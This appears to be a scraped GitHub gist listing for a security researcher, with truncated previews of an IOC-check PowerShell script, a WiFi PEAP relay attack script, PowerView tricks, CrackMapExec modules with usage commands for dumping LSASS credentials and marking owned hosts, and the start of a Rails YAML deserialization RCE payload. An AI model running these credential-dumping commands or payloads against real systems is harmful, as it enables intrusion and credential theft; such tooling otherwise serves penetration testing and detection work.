Skip to content

Instantly share code, notes, and snippets.

Avatar
🏅
“Winning is a conscious decision. Make up your mind !”

mpgn

🏅
“Winning is a conscious decision. Make up your mind !”
View GitHub Profile
View ioc_check.ps1
# https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# https://twitter.com/richinseattle/status/1354296177743679489
# if true on powershell command or no error on reg query output you are infected !
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
[System.IO.File]::Exists('C:\Windows\System32\Nwsapagent.sys')
[System.IO.File]::Exists('C:\Windows\System32\helpsvc.sys')
@mpgn
mpgn / wifi-relay.sh
Created Nov 2, 2020 — forked from 1mm0rt41PC/wifi-relay.sh
Wifi easy PEAP relay
View wifi-relay.sh
#!/bin/bash
# Wifi easy PEAP relay
#
# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
#
# Ref:
# - https://github.com/sensepost/hostapd-mana
# - https://github.com/sensepost/wpa_sycophant
# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052
@mpgn
mpgn / Blackfield vs Crackmapexec.md
Last active Oct 15, 2020
Blackfield vs Crackmapexec for fun and profit @mpgn_x64
@mpgn
mpgn / PowerView-3.0-tricks.ps1
Created Mar 29, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@mpgn
mpgn / README.md
Created Dec 3, 2019
lsassy module for CME
View README.md

Installation

  • Copy lsassy.py in cme/modules
  • Reinstall CrackMapExec python setup.py install

Requirements

Usage

@mpgn
mpgn / README.md
Created Nov 26, 2019
CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker
View README.md

Installation

  • Copy bloodhound_owned.py in cme/modules and reinstall CrackMapExec python setup.py install
  • pip install neo4j

Usage

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M bloodhound_owned
@mpgn
mpgn / areadme.md
Last active Dec 6, 2019
Procdump CME module that dump LSASS process and extract the result with pypykatz
View areadme.md
  1. install pypykatz pip install pypykatz outisde your pipenv
  2. Add this file to cme/module/procdump.py
  3. compile python setup.py install
  4. run cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump

image

@mpgn
mpgn / railspwn.rb
Created Mar 18, 2019 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
View railspwn.rb
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
@mpgn
mpgn / SubtleCrypto.js
Last active Nov 21, 2020
SubtleCrypto javascript example
View SubtleCrypto.js
// exemple based on https://github.com/diafygi/webcrypto-examples#rsa-oaep
function importKey() {
return window.crypto.subtle.importKey(
"jwk", //can be "jwk" or "raw"
{ //this is an example jwk key, "raw" would be an ArrayBuffer
kty: "oct",
k: "Y0zt37HgOx-BY7SQjYVmrqhPkO44Ii2Jcb9yydUDPfE",
alg: "A256GCM",
ext: true,